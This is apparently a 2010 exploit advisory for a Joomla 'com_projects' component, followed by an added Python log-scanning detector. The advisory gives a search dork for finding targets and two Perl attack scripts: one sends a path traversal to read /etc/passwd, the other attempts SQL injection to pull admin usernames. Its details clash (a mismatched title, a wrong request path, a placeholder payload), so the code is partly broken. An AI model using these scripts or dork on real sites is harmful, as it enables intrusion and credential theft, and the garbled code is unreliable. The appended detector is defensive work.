[webapps / 0day] - Joomla Component com_projects LFI &
Posted on 26 October 2010
======================================================
Joomla Component com_projects LFI & SQL Vulnerability
======================================================

[+]Title : Joomla Component com_calendrier RFI Vulnerability
[+]Author : jos_ali_joe
[+]Contact : josalijoe@yahoo.com
[+]Home : http://josalijoe.wordpress.com/

########################################################################

Dork : inurl:index.php?option="com_projects"

########################################################################
[ Software Information ]
########################################################################

[+] Vendor : http://www.codegravity.com/
[+] Download : http://www.joomla.org/download.html
[+] version : Joomla 1.5
[+] Vulnerability : LFI and SQL Vulnerability
[+] Dork : com_projects

########################################################################
[+] Exploit: LFI
====================================================================================
http://localhost/index.php?option=com_projects&controller=[ LFI ]
====================================================================================

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print "########################################################\n";
print "# Joomla Component com_projects LFI Vulnerability #\n";
print "# by jos_ali_joe #\n";
print "########################################################\n";

if (!$ARGV[0]) {
    print "Usage: perl idc.pl [HOST]\n";
    print "Example: perl idc.pl http://localhost/LFI/\n";
} else {
    $web=$ARGV[0];
    chomp $web;
    # As published, the request path is agregar_info.php?tabla=..., not the
    # controller parameter of index.php shown in the URL above.
    $iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00";
    my $web1=$web.$iny;
    print "$web1\n";
    my $ua = LWP::UserAgent->new;
    my $req=HTTP::Request->new(GET=>$web1);
    $doc = $ua->request($req)->as_string;
    # A response line starting with "root" is taken as proof of file inclusion.
    if ($doc=~ /^root/moxis ){
        print "Web is vuln\n";
    } else {
        print "Web is not vuln\n";
    }
}

####################################################################################
[+] Exploit: SQL
====================================================================================
http://localhost/index.php?option=com_projects&view=project&id=[ SQL ]
====================================================================================

use IO::Socket;

if(@ARGV < 1){
    print "
[========================================================================
[// Joomla Component com_projects SQL Injection Exploit
[// Usage: idc.pl [target]
[// Example: idc.pl localhost.com
[// Vuln&Exp : jos_ali_joe
[========================================================================
";
    exit();
}

#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/index.php?option=com_projects&view=project&id=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
    print "-- Exploit Failed[You Are Exited]\n";
    exit();
}

if ($dir =~ /\//){}
else {
    print "-- Exploit Failed[No DIR]\n";
    exit();
}

# As published, the value appended to id= is this literal placeholder string.
$target = "SQL Injection Exploit";
$target = $host.$dir.$file.$target;

#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: * /*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";

#Getting
while($answer = <$socket>) {
    if ($answer =~ /username:(.*?)pass/){
        print "+ Exploit succeed! Getting admin information.\n";
        print "+ ---------------- +\n";
        print "+ Username: $1\n";
    }
}

####################################################################################

Thanks :
./kaMtiEz – ibl13Z – Xrobot – tukulesto – R3m1ck – jundab - asickboys- Vyc0d – Yur4kha - XPanda - eL Farhatz
./ArRay – akatsuchi – K4pt3N – Gameover – antitos – yuki – pokeng – ffadill - Alecs - v3n0m - RJ45
./Kiddies – pL4nkt0n – chaer newbie – andriecom – Abu_adam – Petimati - hakz – Virgi – Anharku - a17z a.k.a maho
./Me Family ATeN4 : ./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe

Greets For :
./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Jatim Crew - Malang Cyber

My Team : ./Indonesian Coder

# Inj3ct0r.com [2010-10-26]
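
As an added example (not part of the original advisory or the component's code): a web-server log check keyed to the two request shapes listed above, `option=com_projects&controller=` and `option=com_projects&view=project&id=`. The allow-list patterns, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate controller is a bare identifier and a legitimate
# id is an integer, optionally followed by a Joomla-style ":alias" slug.
CONTROLLER_OK = re.compile(r"[A-Za-z0-9_]+")
ID_OK = re.compile(r"[0-9]+(?::[A-Za-z0-9_-]+)?")


def check_line(line):
    """Return the list of findings for one access-log line (empty if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # keep_blank_values so an empty "controller=" is still inspected; parse_qs
    # percent-decodes once, which exposes encoded "../" sequences and %00.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "com_projects" not in params.get("option", []):
        return []
    findings = []
    for value in params.get("controller", []):
        if not CONTROLLER_OK.fullmatch(value):
            findings.append("controller-not-identifier")
    for value in params.get("id", []):
        if not ID_OK.fullmatch(value):
            findings.append("id-not-integer")
    return findings


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Oct/2010:10:00:01 +0000] "GET /index.php?option=com_projects&view=project&id=7 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [26/Oct/2010:10:00:02 +0000] "GET /index.php?option=com_projects&view=project&id=7:intranet HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/Oct/2010:10:02:11 +0000] "GET /index.php?option=com_projects&controller=..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 200 312',
    '198.51.100.7 - - [26/Oct/2010:10:02:15 +0000] "GET /index.php?option=com_projects&view=project&id=7%27 HTTP/1.1" 500 0',
    '203.0.113.5 - - [26/Oct/2010:10:03:00 +0000] "GET /index.php?option=com_content&id=../x HTTP/1.1" 200 100',
]


def scan(lines):
    """Map line index -> findings for every line that triggered a rule."""
    return {i: f for i, line in enumerate(lines) if (f := check_line(line))}


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG).items():
        print(idx, findings)
```

The same two allow-list patterns can be enforced in front of the application (for instance as a request filter) so that non-conforming `controller` and `id` values are rejected before they reach the component.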